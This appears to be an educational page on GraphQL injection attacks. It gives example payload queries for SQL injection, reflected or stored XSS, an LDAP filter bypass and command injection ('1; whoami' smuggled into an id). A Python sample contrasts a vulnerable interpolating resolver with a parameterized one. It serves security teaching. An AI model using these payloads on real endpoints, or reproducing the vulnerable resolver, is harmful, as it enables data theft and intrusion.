Injection attacks
SQL Injection
An SQL fragment is injected through an input parameter and reaches the database unchanged, so it acts directly on the sensitive data stored there. By exploiting SQL injection, an attacker can perform operations such as modifying or deleting data.
Example:
query {
  character(id: "2' or 1=1--") {
    id
    name
    species
  }
}
HackerOne report
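To show why the payload above works and how a resolver should be written instead, here is an added example (not code from the original page or any referenced report). It assumes a hypothetical `character(id:)` resolver backed by a constructed in-memory SQLite table; the vulnerable variant splices the GraphQL argument into the SQL text, the hardened one validates the argument and binds it as a parameter.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE character (id INTEGER PRIMARY KEY, name TEXT, species TEXT)")
    conn.executemany(
        "INSERT INTO character VALUES (?, ?, ?)",
        [(1, "Rick", "Human"), (2, "Morty", "Human"), (3, "Birdperson", "Bird")],
    )
    return conn


def _rows(cursor):
    return [dict(zip(("id", "name", "species"), row)) for row in cursor]


def resolve_character_vulnerable(conn, character_id):
    """Hypothetical resolver for character(id:) that interpolates the argument.
    An id of 2' or 1=1-- rewrites the WHERE clause, and the trailing -- comments
    out the closing quote, so every row comes back instead of one."""
    sql = f"SELECT id, name, species FROM character WHERE id = '{character_id}'"
    return _rows(conn.execute(sql))


def is_valid_id(value):
    """Allow-list check: a character id must be a plain string of digits."""
    return isinstance(value, str) and value.isdigit()


def resolve_character_safe(conn, character_id):
    """Hardened resolver: reject anything that is not a numeric id, then bind the
    value as a query parameter so it can never be parsed as SQL."""
    if not is_valid_id(character_id):
        return []  # a GraphQL server would normally surface this as a validation error
    sql = "SELECT id, name, species FROM character WHERE id = ?"
    return _rows(conn.execute(sql, (int(character_id),)))


if __name__ == "__main__":
    db = make_db()
    print(resolve_character_vulnerable(db, "2' or 1=1--"))  # all three rows leak
    print(resolve_character_safe(db, "2' or 1=1--"))        # rejected: []
    print(resolve_character_safe(db, "2"))                  # only Morty
```

The same injected string is the one from the query above; the hardened resolver rejects it before it reaches the database, while the vulnerable one returns every character.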
Cross-Site Scripting [XSS]
GraphQL can also be vulnerable to cross-site scripting if the output of a query is reflected in the application or stored in the database. It can be vulnerable to both reflected XSS and stored XSS.
Example:
mutation {
  character(id: "1\"><img src=z onerror=alert(2)>") {
    name
    id
  }
}
HackerOne report
Research on AppSec on GraphQL
LDAP & Command Injection
LDAP injection vulnerabilities may allow an attacker to bypass authentication controls and access or manipulate arbitrary data within the LDAP directory.
Example:
mutation {
  authenticateUser(username: "*)(uid=*))(|(&(objectClass=person))", password: "anything") {
    id
    name
    __typename
  }
}
Command injection allows an attacker to execute commands on the host operating system through an application. In GraphQL, if user inputs are not properly validated or sanitized before being passed to the shell, an attacker could exploit this to execute shell commands.
Example:
mutation {
  character(id: "1; whoami") {
    output
    id
    __typename
  }
}
Practice more on DVGA (Damn Vulnerable GraphQL Application).
